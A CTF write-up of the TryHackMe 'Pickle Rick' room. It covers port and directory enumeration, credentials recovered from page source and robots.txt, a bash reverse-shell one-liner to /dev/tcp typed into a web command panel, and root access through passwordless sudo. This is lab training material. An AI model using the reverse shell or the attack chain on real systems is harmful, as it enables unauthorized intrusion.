TryHackMe:Pickle Rick [CTF]

A Rick and Morty CTF. Help turn Rick back into a human!


Pickle Rick Write up


First, let’s do an enumeration with the IP address of this machine. I’m gonna run Nmap [Netwok Mapper] to scan any open ports. I’m gonna run this command

nmap -sC -sV -oN nmap/initial <machine ip>

Explaining the nmap flag

  • -sC := scan using nmap default script
  • -sV := scan for version
  • -oN := output in normal format
nmap scan

Nmap scan shows us. There are 2 ports open ssh and HTTP. First, I’m gonna check port 80 because not common for ssh to log in as anonymous. Let’s check it out.

Cool! we got this web page

web page

This is the very first thing I’m gonna do. You always need to check the page source code maybe we can find something interesting. Well, yes we did.

view page source

In this page source. We can see the comment says ‘Note to self, remember username!’. We have a username. Unfortunately, we don’t know where to log in as this username.

Well, I’m gonna run gobuster. Gobuster is a tool to find the hidden directory on this website

gobuster dir -u http://<machine ip> -w /path/to/wordlist.txt -x php,.txt,.html

gobuster scan

The scan result shows us the hidden directory called login.php with status code 200 and we also found robots.txt

Let’s take a look at the login.php and robots.txt


If you remember. In the beginning, we found the username. If you look closely at the robots.txt it looks like something, maybe it is the password. Let’s try it.

login now

wow! it’s working. We can see on this page, we can run the command in that box. So, I’m gonna execute reverse shell on that to make an easy foothold.

2:Foothold/Gaining Access

bash -c ‘bash -i >& /dev/tcp/<your ip>/<listening port> 0>&1’

bash reverse shell
reverse shell

First, what I like to do is run the sudo -l command to check sudo permission/capability. You can check this out here.

sudo -l

After, we ran that command. It says “(ALL) NOPASSWD: ALL”. This says ‘Hey dude! you can run sudo without a password at all and be free to use it’. This happens because of not properly configure the user and root.

Now, Let’s try find the first ingredient Rick needs.

The 1 ingredient

Ok. We just have the first ingredient. However, We need two more the ingredient. So, let’s try to see any user home directory exists. Look like the user rick exists. Let’s try to check it out.

The 2 ingredient

3:Privilege Escalation

As we know, This user www-data can run sudo without a password at all. This means we can be root by running the command sudo su.

The 3 ingredient

WoW! We just solve this box with ease and gain a lot of knowledge.


I’ve learned a lot today. This shows us how dangerous it is if you don’t configure something properly. In this case, is the sudo command. However, An attacker can be root in your machine if they have a good and strong foothold. Well, before an attacker can access make sure you have to patch all of your weak systems. In this machine, the website can execute bash. This is bad and an attacker easily got the reverse shell.

This room so much fun and I hope you guys have fun and learn something new today.

cat goes meow